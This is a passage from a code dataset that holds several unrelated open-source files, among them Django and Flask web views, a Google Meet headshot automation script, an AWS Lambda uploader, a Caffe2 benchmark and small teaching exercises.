except ValueError:\n raise BadRequest(\"Invalid Request\")\n except ObjectDoesNotExist:\n raise BadRequest(\"Invalid video id\")\n\n video_obj.views += 1\n update_views(int(request.GET['video-id']))\n video_obj.save()\n\n return JsonResponse(\n {\n \"title\": video_obj.title,\n \"url\": request.get_host() + \"/\" + str(video_obj.location),\n \"views\": video_obj.views,\n \"date\": video_obj.date,\n \"labels\": get_video_labels(video_obj.id)\n }\n )\n\n max_amount = 15\n\n if 'max' in get_body:\n try:\n max_amount = int(get_body['max']) if int(get_body['max']) > 0 else 15\n except ValueError:\n max_amount = 15\n\n if 'page' in get_body:\n try:\n page = int(get_body['page'])\n if page < 1:\n raise BadRequest(\"Invalid page number\")\n return JsonResponse(\n paged_video_data(Video.objects.values_list(), request, page, no_of_videos=max_amount))\n except ValueError:\n raise BadRequest(\"Invalid page number\")\n\n return JsonResponse(paged_video_data(Video.objects.values_list(), request))\n\n\ndef search(request):\n if request.method == \"GET\":\n get_body = request.GET\n page = 1\n if 'filter' not in get_body and 'q' not in get_body:\n raise BadRequest(\"Invalid Request\")\n query = \"\"\n if 'q' in get_body:\n query = get_body['q']\n\n max_amount = 15\n\n if 'max' in get_body:\n try:\n max_amount = int(get_body['max']) if int(get_body['max']) > 0 else 15\n except ValueError:\n max_amount = 15\n\n if 'page' in get_body:\n try:\n page = int(get_body['page'])\n if page < 1:\n raise BadRequest(\"Invalid page number\")\n\n except ValueError:\n raise BadRequest(\"Invalid page number\")\n\n filters = request.GET.getlist('filter')\n print(filters)\n videos = Video.objects.filter(title__contains=query)\n if len(filters) == 0:\n data_dict = paged_video_data(video_sets_creator(videos), request, page, max_amount)\n return JsonResponse(data_dict)\n for _filter in filters:\n if not Labels.objects.filter(label=_filter).exists():\n return HttpResponse(\"Invalid filter\", status=400)\n\n label_ids = get_label_ids(filters)\n filtered_videos = []\n filtered_videos_obj = []\n for label_id in label_ids:\n video_ids = [curr_id['video'] for curr_id in VideoLabels.objects.filter(label=label_id).values('video')]\n filtered_videos += video_ids\n for video in videos:\n if video.id in filtered_videos:\n filtered_videos_obj.append(video)\n\n data_dict = paged_video_data(video_sets_creator(filtered_videos_obj), request, page, max_amount)\n return JsonResponse(data_dict)\n","repo_name":"irusha/cs50fp","sub_path":"homehub/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23146007375","text":"# Functions\r\n\r\n# checks the user enters an integer between a low and high number\r\ndef int_check(question, low=None, high=None):\r\n situation = \"\"\r\n\r\n if low is not None and high is not None:\r\n situation = \"both\"\r\n elif low is not None and high is None:\r\n situation = \"low only\"\r\n\r\n while True:\r\n try:\r\n # Ask the question\r\n response = int(input(question))\r\n\r\n # Checks input is not too high or\r\n # too low if both upper and\r\n # lower bounds are specified\r\n if situation == \"both\":\r\n if response < low or response > high:\r\n print(\"Please enter a number between \"\r\n f\"{low} and {high}\")\r\n continue\r\n\r\n # Checks input is not too low\r\n elif situation == \"low only\":\r\n if response < low:\r\n print(\"Please enter a number that is more \"\r\n f\"than (or equal to) {low}\")\r\n continue\r\n\r\n return response\r\n\r\n # Checks input is an integer\r\n except ValueError:\r\n print(\"Please enter an integer\")\r\n continue\r\n\r\n\r\n# Main Routine\r\nsec_num = 50\r\nlow_num = 1\r\nhigh_num = 100\r\n\r\nnum_guesses = 0\r\nrounds_won = 0\r\nrounds_played = 0\r\n\r\nresult = \"wrong\"\r\nwhile result == \"wrong\":\r\n\r\n user_guess = int_check(\"Please enter your guess: \", low_num, high_num)\r\n\r\n if user_guess < sec_num:\r\n print(\"Higher\")\r\n num_guesses += 1\r\n\r\n if user_guess > sec_num:\r\n print(\"Lower\")\r\n num_guesses += 1\r\n\r\n if user_guess == sec_num:\r\n num_guesses += 1\r\n rounds_won += 1\r\n result = \"Won\"\r\n continue\r\n\r\n\r\nrounds_played += 1\r\nprint(f\"You {result}\")\r\nprint()\r\n\r\n\r\n","repo_name":"smithr1057/07_Higher_lower-","sub_path":"04_user_hl.py","file_name":"04_user_hl.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30739643256","text":"# coding: utf-8\nfrom flask import Blueprint, render_template, request, jsonify\nfrom models.member import Member\nimport math\n\nadmin_view = Blueprint('admin_view', __name__)\n\n@admin_view.route('/')\ndef index():\n return render_template('admin/index.jade', data = {'a': 123})\n\n@admin_view.route('/fetch_members', methods = ['POST'])\ndef fetch_members():\n rows = 10\n page = 0\n if 'rows' in request.json:\n rows = int(request.json['rows'])\n if 'page' in request.json:\n page = int(request.json['page'])\n data = Member.fetch_members(page = page, rows = rows)\n count = Member.query.count()\n pages = 1\n if count > 0: pages = int(math.ceil(count / float(rows)))\n return jsonify({'status': 0, 'data': data, 'pages': pages})\n\n@admin_view.route('/update_member', methods = ['POST'])\ndef update_member():\n Member.update_member(request.json)\n return jsonify({'status': 0})","repo_name":"mymy3697166/patg","sub_path":"controllers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40499213422","text":"\"\"\"\n\n 1. Detect new user come in\n 2. Detect new user left\n 3. post to chat\n 4. take screen photo\n 5. save screen photo to directory\n 6.
stitch it all into mosaic image ( side mission )\n\n\"\"\"\n\nimport time\nimport calendar\nimport re\nimport os\n\nimport module_mouse_coordinate_capture\nimport module_mouse_click\nimport module_screen_take_photo\nimport module_screen_read_photo\nimport module_screen_crop_and_save_photo\nimport module_keyboard_type\n\n\nprint(\"----- WELCOME -----\")\n\nprint(\"First, please click on icon of 'Chat' Tab title header\")\nx_chat_title, y_chat_title = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_chat_title, y_chat_title)\n\nprint(\"Second, please click on Chat Box\")\nx_chat_box, y_chat_box = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_chat_box, y_chat_box)\n\nprint(\"Please click on icon of 'People (..)' Tab title header\")\nx_people_title, y_people_title = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_people_title, y_people_title)\n\nprint(\"Please click on second line of guest list, where the guest's icon will be at\")\nx_guest_name, y_guest_name = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_guest_name, y_guest_name)\n\nprint(\"Please click on Top Left Of guest's Headshot Photo on Screen\")\nx_top_left_headshot, y_top_left_headshot = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_top_left_headshot, y_top_left_headshot)\n\nprint(\"Please click on Bottom Right Of guest's Headshot Photo on Screen\")\nx_bottom_right_headshot, y_bottom_right_headshot = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_bottom_right_headshot, y_bottom_right_headshot)\n\n\n\n\nprint(\"----- CONFIGURATION COMPLETED -----\")\n\ntime.sleep(3)\n\nprint(\"----- TAKING PHOTOS -----\")\n\n# Loop:\n# 1. Capture Screen Shot, Parse Human Count\n# 2. If !1 people, Click on Chat Tab\n# 3. Parse Name\n# 4. Print \"Taking Picture in 3..\"\n# 5. Print \"Smile\"\n# 6. Save file captured in step (1), cropped with top-left and bottom_right in config-gathering, and save as {guest-name}.png\n# 7. Print \"Done, Thank you 'name', Please leave!\"\n# 8. Click on People Tab\n# 9. ElIf 1 people, Pass\n# 10.
Sleep 3 second\n\nwhile True:\n\n module_mouse_click.click(x_people_title, y_people_title, True)\n\n # Sub Step A:\n scout_file_name = \"photos/scouting.png\"\n module_screen_take_photo.save_screen_shot(scout_file_name)\n text_guest_count = module_screen_read_photo.ocr_core(scout_file_name, x_people_title, y_people_title)\n\n count_human = 1\n count_human_str_search = re.search(' \\(([0-9]+)\\)', text_guest_count)\n if count_human_str_search:\n count_human = int(count_human_str_search.group(1))\n\n print(count_human)\n # Sub Step B\n if count_human == 2:\n text_guest_name = module_screen_read_photo.ocr_core(scout_file_name, x_guest_name, y_guest_name).strip()\n print('Handling : ', text_guest_name)\n\n module_mouse_click.click(x_chat_title, y_chat_title, True)\n time.sleep(1)\n\n # Sub Step C, D\n module_keyboard_type.type_string('Taking picture in: 3, 2...')\n module_keyboard_type.enter()\n time.sleep(3)\n module_keyboard_type.type_string('Smile!')\n module_keyboard_type.enter()\n module_keyboard_type.enter()\n time.sleep(1)\n\n # Sub Step E: Save this image\n guest_file_name = './photos/{}__{}.png'.format(text_guest_name, str(calendar.timegm(time.gmtime())))\n module_screen_crop_and_save_photo.crop_and_save(scout_file_name, guest_file_name, x_top_left_headshot, y_top_left_headshot, x_bottom_right_headshot, y_bottom_right_headshot)\n\n\n # Sub Step F: Kick them out\n module_keyboard_type.type_string('Thank you {}, You can leave now!'.format(text_guest_name))\n module_keyboard_type.enter()\n module_keyboard_type.enter()\n\n time.sleep(5)\n\n # Sub Step G: Click on People Tab\n module_mouse_click.click(x_people_title, y_people_title, True)\n\n\n elif count_human > 2:\n print(\"TOO MANY PEOPLE\")\n\n time.sleep(3)\n","repo_name":"ikendoit/google-meet-headshot-photography","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27127336405","text":"import boto3\nimport requests\nfrom requests_aws4auth import AWS4Auth\nimport os\nimport json\nimport datetime\n\nregion = 'us-east-1'\nservice = 'es'\ncredentials = boto3.Session().get_credentials()\nawsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\nindex = 'lambda-s3-index'\ntype = 'lambda-type'\nhost = os.environ['ES_DOMAIN_URL']\nurl = host + '/' + index + '/' + type\n\nheaders = { \"Content-Type\": \"application/json\" }\n\ns3 = boto3.client('s3')\nbucket = os.environ['S3_BUCKET']\n\n# Lambda execution starts here\ndef handler(event, context):\n \n sensorID = event['sensorID']\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n temperature = event['temperature']\n \n document = { \"sensorID\": sensorID, \"timestamp\": timestamp, \"temperature\": temperature }\n print(document)\n # post to S3 for storage\n s3.put_object(Body=json.dumps(document).encode(), Bucket=bucket, Key=sensorID+\"-\"+timestamp+\".json\")\n # post to amazon elastic search for indexing and kibana use\n r = requests.post(url, auth=awsauth, json=document, headers=headers)\n print(r)\n response = \"Data Uploaded\"\n return {\n \"Response\" : response,\n \"sensorID\" : sensorID,\n \"temperature\": temperature\n
}","repo_name":"luch-o/aws-arch-course","sub_path":"datalakes-course/w2-opensearch-cluster/upload_data/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"467090729","text":"# coding: utf8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport mock\nimport pytest\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.test import APIRequestFactory\n\nfrom common.tester.factories import create_station\nfrom travel.rasp.train_api.train_purchase.core.factories import TrainOrderFactory, PaymentFactory\nfrom travel.rasp.train_api.train_purchase.utils.decorators import order_view\n\n\ndef call_api_order_view(uid):\n inner_mock = mock.Mock(__name__=b'inner_mock', return_value=Response())\n actual_order_view = order_view()\n view = api_view()(actual_order_view(inner_mock))\n return view(APIRequestFactory().get('/'), uid=uid), inner_mock\n\n\n@pytest.mark.dbuser\n@pytest.mark.mongouser\ndef test_order_view():\n order = TrainOrderFactory()\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 200\n inner_mock.assert_called_once_with(mock.ANY, order)\n\n\ndef test_order_view_not_found():\n response, inner_mock = call_api_order_view('invalid_uid')\n\n assert response.status_code == 404\n assert response.data == {'errors': {'uid': 'Order was not found'}}\n inner_mock.assert_not_called()\n\n\n@pytest.mark.dbuser\n@pytest.mark.mongouser\ndef test_order_view_unhandled_exception_state_booking():\n station_from = create_station()\n station_to = create_station()\n order = TrainOrderFactory(station_from=station_from, station_to=station_to,\n process={'state': 'unhandled_exception_state'})\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 500\n assert response.data == {\n 'errors': {\n 'process_exception_state': {\n 'type': 'process_exception_state',\n 'data': {'orderNumber': None},\n 'message': None\n }\n }\n }\n inner_mock.assert_not_called()\n\n order = TrainOrderFactory(station_from=station_from, station_to=station_to,\n process={'state': 'unhandled_exception_state'}, partner_data=dict(order_num='100500'))\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 500\n assert response.data == {\n 'errors': {\n 'process_exception_state': {\n 'type': 'process_exception_state',\n 'data': {'orderNumber': '100500'},\n 'message': None\n }\n }\n }\n inner_mock.assert_not_called()\n\n\n@pytest.mark.dbuser\n@pytest.mark.mongouser\ndef test_order_view_unhandled_exception_state_payment():\n station_from = create_station()\n station_to = create_station()\n order = TrainOrderFactory(station_from=station_from, station_to=station_to, partner_data=dict(order_num='200500'))\n PaymentFactory(order_uid=order.uid, process={'state': 'unhandled_exception_state'})\n\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 500\n assert response.data == {\n 'errors': {\n 'process_exception_state': {\n 'type': 'process_exception_state',\n 'data': {'orderNumber': '200500'},\n 'message': None\n }\n }\n }\n 
inner_mock.assert_not_called()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/train_purchase/utils/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13451589100","text":"# -*- coding: utf-8 -*-\n\nimport simple_draw as sd\n\n# Ask the user for the desired figure by letting them choose from the existing ones:\n# print a numbered list of all figures and wait for the number of the desired figure,\n# then draw that figure in the center of the screen\n\n# Copy the functions from exercise lesson_004/02_global_color.py here\n# For the expected result see lesson_004/results/exercise_03_shape_select.jpg\n\nCOLORS = [\n {'name': 'red', 'name_root': 'red', 'code': sd.COLOR_RED},\n {'name': 'orange', 'name_root': 'orang', 'code': sd.COLOR_ORANGE},\n {'name': 'yellow', 'name_root': 'yellow', 'code': sd.COLOR_YELLOW},\n {'name': 'green', 'name_root': 'green', 'code': sd.COLOR_GREEN},\n {'name': 'cyan', 'name_root': 'cyan', 'code': sd.COLOR_CYAN},\n {'name': 'blue', 'name_root': 'blue', 'code': sd.COLOR_BLUE},\n {'name': 'purple', 'name_root': 'purpl', 'code': sd.COLOR_PURPLE},\n]\n\n\ndef draw_polygon(origin=None, angle=0, side_length=10, sides_number=4, color=sd.COLOR_YELLOW):\n if not isinstance(origin, sd.Point):\n print('Incorrect point')\n return\n angle_step = round(360 / sides_number)\n next_start_point = origin\n\n for next_angle in range(angle, 360 + angle - angle_step, angle_step):\n next_start_point = sd.vector(start=next_start_point, angle=next_angle, length=side_length, color=color)\n\n sd.line(next_start_point, origin, color=color)\n\n\ndef draw_triangle(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=3, color=color)\n\n\ndef draw_square(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=4, color=color)\n\n\ndef draw_pentagon(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=5, color=color)\n\n\ndef draw_hexagon(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=6, color=color)\n\n\nPOLYGONS = [\n {'name': 'triangle', 'function': draw_triangle},\n {'name': 'square', 'function': draw_square},\n {'name': 'pentagon', 'function': draw_pentagon},\n {'name': 'hexagon', 'function': draw_hexagon},\n]\n\n\n# ask for the color\nglobal_color = None\nwhile not global_color:\n for number, color in enumerate(COLORS):\n print(f' {number} - {color[\"name\"]}')\n user_answer = input('Enter the number or the name of the rainbow color '\n 'you want to draw the figures with > ')\n user_answer = user_answer.lower()\n\n # if the user entered a number, just take the color from COLORS by that index\n if user_answer.isnumeric():\n user_answer = int(user_answer)\n if 0 <= user_answer < len(COLORS):\n global_color = COLORS[user_answer]['code']\n\n else:\n # go through the colors looking for a name root inside the user's input and take the matching color\n for color in COLORS:\n if color['name_root'] in user_answer:\n global_color = color['code']\n break\n\n if not global_color:\n print('\\nYou entered an invalid color. Type one of the rainbow colors in English, or enter its number.\\n'\n 'Hint:')
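\n# e.g. an input like 'dark red' contains the name root 'red', so COLOR_RED would be picked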
\n\n# ask for the number of sides\npolygon_function = None\nprint()\nwhile not polygon_function:\n for number, polygon in enumerate(POLYGONS):\n print(f' {number} - {polygon[\"name\"]}')\n user_answer = input('Which figure do you want to draw? > ')\n\n if user_answer.isnumeric():\n user_answer = int(user_answer)\n if 0 <= user_answer < len(POLYGONS):\n polygon_function = POLYGONS[user_answer]['function']\n\n else:\n print('\\nIt looks like you accidentally entered the wrong number. Try again.')\n\nsd.resolution = (600, 600)\n\npolygon_origin = sd.get_point(100, 100)\npolygon_function(origin=polygon_origin, angle=20, side_length=100, color=global_color)\n\n\nsd.pause()\n\n# passed!\n","repo_name":"glotyuids/skillbox_learning","sub_path":"lesson_004/03_shape_select.py","file_name":"03_shape_select.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14648117238","text":"from random import randint\n\n\nclass Agencia:\n\n def __init__(self, telefone, cnpj, numero):\n self.telefone = telefone\n self.cnpj = cnpj\n self.numero = numero\n self.clientes = []\n self.caixa = 0\n self.emprestimos = []\n\n def verificar_caixa(self):\n if self.caixa < 1000000:\n print('Cash below the recommended level. Current cash: R${:,.2f}'.format(self.caixa))\n else:\n print('The cash level is ok. Current cash: R${:,.2f}'.format(self.caixa))\n\n def emprestar_dinheiro(self, valor, cpf, juros):\n if self.caixa > valor:\n self.emprestimos.append((valor, cpf, juros))\n else:\n print('No money to lend')\n \n def adicionar_cliente(self, nome, cpf, patrimonio):\n self.clientes.append((nome, cpf, patrimonio))\n\n\nclass AgenciaVirtual(Agencia):\n \n def __init__(self, site, telefone, cnpj):\n self.site = site\n super().__init__(telefone, cnpj, 1000)\n self.caixa = 1000000\n self.caixa_paypal = 0\n\n def depositar_paypal(self, valor):\n if self.caixa > valor:\n self.caixa -= valor\n self.caixa_paypal += valor\n print('Transfer completed\\nCash balance: R${:,.2f}\\nPayPal balance: R${:,.2f}'.format(self.caixa, self.caixa_paypal))\n else:\n print('Insufficient cash for the transfer!')\n\n def sacar_paypal(self, valor):\n if self.caixa_paypal > valor:\n self.caixa_paypal -= valor\n self.caixa += valor\n print('Transfer completed\\nCash balance: R${:,.2f}\\nPayPal balance: R${:,.2f}'.format(self.caixa, self.caixa_paypal))\n else:\n print('Insufficient PayPal balance for the transfer!')\n\n\nclass AgenciaComum(Agencia):\n \n def __init__(self, telefone, cnpj):\n super().__init__(telefone, cnpj, numero=randint(1001, 9999))\n self.caixa = 1000000\n\n\nclass AgenciaPremium(Agencia):\n\n def __init__(self, telefone, cnpj):\n super().__init__(telefone, cnpj, numero=randint(1001, 9999))\n self.caixa = 10000000\n\n def adicionar_cliente(self, nome, cpf, patrimonio):\n if patrimonio >= 1000000:\n super().adicionar_cliente(nome, cpf, patrimonio)\n else:\n print('Cannot add this client.')\n\n\n\n# Code\nif __name__ == '__main__':\n agencia1 = Agencia(20203891, 2040281039, 3748)\n\n agencia_virtual = AgenciaVirtual('www.agenciavirtual.com', 22224444, 1921000000)\n agencia_virtual.verificar_caixa()\n\n agencia_comum = AgenciaComum(33332222, 323422222)\n agencia_premium = AgenciaPremium(22918493, 3920000010)\n\n agencia_virtual.depositar_paypal(20000)\n
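    # e.g. (hypothetical values): adicionar_cliente('Ana', 11122233344, 500000) would be\n    # rejected with the message above, since the patrimonio is below 1000000\n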
agencia_premium.adicionar_cliente('Pedro', 74892730281, 1000000)\n print(agencia_premium.clientes)\n","repo_name":"GabriellCabrall/python-impressionador","sub_path":"Modulo_37_Orientacao_a_objetos/Agencia.py","file_name":"Agencia.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14816608079","text":"\n\nimport argparse\nimport datetime\n\nimport numpy as np\nfrom caffe2.python import core, workspace\n\n\nDTYPES = {\n \"uint8\": np.uint8,\n \"uint8_fused\": np.uint8,\n \"float\": np.float32,\n \"float16\": np.float16,\n}\n\n\ndef benchmark_sparse_lengths_sum(\n dtype_str,\n categorical_limit,\n embedding_size,\n average_len,\n batch_size,\n iterations,\n flush_cache,\n):\n print(\"Preparing lookup table. \" + str(datetime.datetime.now()))\n\n # We will use a constant, but non-trivial value so we save initialization\n # time.\n data = np.ones([categorical_limit, embedding_size], dtype=np.float32)\n data *= 17.01\n\n if dtype_str == \"uint8\":\n scale_bias = np.random.rand(categorical_limit, 2).astype(np.float32)\n workspace.FeedBlob(\"scale_bias\", scale_bias.astype(np.float32))\n elif dtype_str == \"uint8_fused\":\n scale_bias = np.random.randint(255, size=(categorical_limit, 8))\n data = np.concatenate([data, scale_bias], axis=1)\n\n print(\"Data has shape {} {}\".format(data.shape, datetime.datetime.now()))\n workspace.FeedBlob(\"X\", data.astype(DTYPES[dtype_str]))\n\n # In order to produce truly random lengths and indices, we will embed a\n # Python operator in the net to generate them.\n def f(_, outputs):\n lengths = np.random.randint(\n int(np.round(average_len * 0.75)),\n int(np.round(average_len * 1.25)) + 1,\n batch_size,\n ).astype(np.int32)\n indices = np.random.randint(0, categorical_limit, np.sum(lengths)).astype(\n np.int64\n )\n outputs[0].feed(indices)\n outputs[1].feed(lengths)\n\n init_net = core.Net(\"init_net\")\n init_net.Python(f)([], [\"indices\", \"lengths\"])\n workspace.RunNetOnce(init_net)\n\n net = core.Net(\"mynet\")\n if flush_cache:\n l3_cache_size = 30 * 2 ** 20 // 4\n workspace.FeedBlob(\n \"huge_blob\", np.random.randn(l3_cache_size).astype(np.float32)\n )\n net.Scale(\"huge_blob\", \"huge_blob_2x\", value=2.0)\n if dtype_str == \"uint8\":\n net.SparseLengthsSum8BitsRowwise([\"X\", \"indices\", \"lengths\", \"scale_bias\"], \"Y\")\n elif dtype_str == \"uint8_fused\":\n net.SparseLengthsSumFused8BitRowwise([\"X\", \"indices\", \"lengths\"], \"Y\")\n else:\n net.SparseLengthsSum([\"X\", \"indices\", \"lengths\"], \"Y\")\n workspace.CreateNet(net)\n\n # Set random seed, so that repeated runs will keep the same sequence of\n # random indices.\n np.random.seed(1701)\n\n print(\"Preparation finished. 
\" + str(datetime.datetime.now()))\n\n runtimes = workspace.BenchmarkNet(net.Name(), 1, iterations, True)\n print(\n \"{} billion sums per cycle\".format(\n embedding_size\n * workspace.FetchBlob(\"indices\").size\n / runtimes[2 if flush_cache else 1]\n / 1e6\n )\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"minimal benchmark for sparse lengths sum.\"\n )\n parser.add_argument(\n \"-d\",\n \"--dtype\",\n choices=list(DTYPES.keys()),\n default=\"float\",\n help=\"The data type for the input lookup table.\",\n )\n parser.add_argument(\n \"-e\", \"--embedding-size\", type=int, default=6000000, help=\"Lookup table size.\"\n )\n parser.add_argument(\n \"--embedding-dim\", type=int, default=128, help=\"Embedding dimension.\"\n )\n parser.add_argument(\n \"--average-len\",\n type=int,\n default=27,\n help=\"Sparse feature average lengths, default is 27\",\n )\n parser.add_argument(\"--batch-size\", type=int, default=100, help=\"The batch size.\")\n parser.add_argument(\n \"-i\", \"--iteration\", type=int, default=100000, help=\"The number of iterations.\"\n )\n parser.add_argument(\n \"--flush-cache\", action=\"store_true\", help=\"If true, flush cache\"\n )\n args, extra_args = parser.parse_known_args()\n core.GlobalInit([\"python\"] + extra_args)\n benchmark_sparse_lengths_sum(\n args.dtype,\n args.embedding_size,\n args.embedding_dim,\n args.average_len,\n args.batch_size,\n args.iteration,\n args.flush_cache,\n )\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/operator_test/sparse_lengths_sum_benchmark.py","file_name":"sparse_lengths_sum_benchmark.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"42700300548","text":"from django.http import HttpResponse\nfrom django.template.context_processors import csrf\nfrom django.core import serializers\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.hashers import make_password\nfrom django.shortcuts import render, render_to_response, redirect\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils import timezone\nfrom django.views import generic\n\nfrom users.models import EvoUser, UserForm\nfrom utils.decorators import ajax_view, AjaxError\n\nimport logging, sys\n\nlogger = logging.getLogger(__name__)\n# print >>sys.stderr, \"Groups\"\n# c.update(csrf(request))\n\ndef sign_up(request):\n if request.method == 'POST':\n params = request.POST.copy()\n \n params['password'] = make_password(params['password'])\n params['created_at'] = timezone.now()\n params['updated_at'] = timezone.now()\n params['date_joined'] = timezone.now()\n params['last_login'] = timezone.now()\n\n form = UserForm(data = params, auto_id=True)\n \n if form.is_valid():\n user = form.save()\n user.is_active = True\n user.save()\n \n form_msg = _(\"the user was successfully registered\")\n return render(request, 'users/_sign_up_success.html', {'form_msg': form_msg})\n else:\n form_errors = form.errors\n# form_cleaned = form.cleaned_data\n return render(request, 'users/_sign_up_errors.html', {'form_errors': form_errors})\n else:\n form = UserForm(auto_id=True)\n context = {'form': form}\n return render(request, 'home/index.html', context)\n\ndef sign_in(request):\n if request.method == 'POST':\n params = request.POST.copy()\n user = authenticate(username=params['username'], password=params['password'])\n \n if user is not None:\n #user.is_active = True\n 
#user.save()\n #print >>sys.stderr, user.is_active\n if user.is_active:\n login(request, user)\n #print >>sys.stderr, \"request.user\"\n #print >>sys.stderr, dir(request.user)\n print >>sys.stderr, request.user.__class__.__name__\n print >>sys.stderr, \"request.user.is_authenticated()\"\n print >>sys.stderr, request.user.is_authenticated()\n form_msg = _(\"welcome to Evolucion Web\")\n return render(request, 'users/_sign_in_success.html', {'form_msg': form_msg})\n else:\n form_msg = _(\"the user is not active\")\n return render(request, 'users/_sign_in_errors.html', {'form_msg': form_msg})\n \n else:\n form_msg = _(\"the username or password is not correct.\")\n return render(request, 'users/_sign_in_errors.html', {'form_msg': form_msg})\n\ndef user_logout(request):\n if request.method == 'POST':\n if request.user.is_authenticated():\n logout(request)\n response = redirect('/')\n response.delete_cookie('sessionid')\n return response\n\nclass UserEdit(generic.View):\n model = EvoUser\n form_class = UserForm\n template_name = 'users/edit.html'\n \n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated():\n user = EvoUser.objects.get(pk=request.user.id)\n form = UserForm(instance=user, auto_id=True)\n \n context = self.get_context_data(**kwargs)\n context['user'] = request.user\n context['form'] = form\n \n return render(request, self.template_name, context)\n else:\n return redirect('/')\n \n \n def post(self, request, *args, **kwargs):\n #user = self.instance.user\n user = EvoUser.objects.get(pk=request.user.id)\n \n form_class = self.get_form_class()\n \n params = request.POST.copy()\n params['password'] = user.password\n params['created_at'] = user.created_at\n params['updated_at'] = timezone.now()\n params['date_joined']= user.date_joined\n params['last_login'] = user.last_login\n \n form = UserForm(data = params, instance=user, auto_id=True)\n \n if form.is_valid():\n user = form.save()\n form_msg = _(\"the user was successfully registered\")\n return render(request, 'users/_edit_success.html', {'form_msg': form_msg})\n else:\n form_errors = form.errors\n form_cleaned = form.cleaned_data\n return render(request, 'users/_edit_errors.html', {'form_errors': form_errors})\n \n #context = {}\n #context['user'] = user\n #context['form'] = form\n \n #return render(request, 'users/edit.html', context)\n \n #def form_valid(self, form):\n # This method is called when valid form data has been POSTed.\n # It should return an HttpResponse.\n # form.send_email()\n # return super(UserEdit, self).form_valid(form)\n\n\ndef edit(request):\n user = request.user\n context = {}\n \n if user.is_anonymous():\n form = UserForm(auto_id=True)\n context['form'] = form\n \n return render(request, 'users/edit.html', context)\n\ndef get_xml(request):\n users = EvoUser.objects.all()\n return HttpResponse(\n serializers.serialize(\"xml\", users),\n content_type = 'text/xml; charset=utf8')\n\ndef get_html(request):\n html = render(request, 'layouts/_footer.html', {})\n return html\n\n@ajax_view\ndef get_json(request):\n user = EvoUser.objects.get(pk=1)\n return user.username\n","repo_name":"johnciclus/evolucion","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40089695992","text":"from sqlalchemy.orm import Session\nfrom schemes import food_cheme as scheme\nimport models\n\n\ndef get_by_id(db: Session, food_id: int):\n return 
db.query(models.Food).filter(models.Food.id == food_id).first()\n\n\ndef get_all(db: Session, skip: int = 0, limit: int = 100):\n return db.query(models.Food).offset(skip).limit(limit).all()\n\n\ndef create(db: Session, food: scheme.FoodBase):\n db_food = models.Food(name=food.name, description=food.description, calories=food.calories, carbs=food.carbs,\n fat=food.fat)\n db.add(db_food)\n db.commit()\n db.refresh(db_food)\n return db_food\n\n\ndef update(db: Session, food_id: int, food: scheme.FoodBase):\n db_food = get_by_id(db, food_id)\n db_food.name = food.name\n db_food.description = food.description\n db_food.calories = food.calories\n db_food.carbs = food.carbs\n db_food.fat = food.fat\n db_food.protein = food.protein\n db.commit()\n db.refresh(db_food)\n return db_food\n\n\ndef delete(db: Session, food_id: int):\n db_food = get_by_id(db, food_id)\n db.delete(db_food)\n 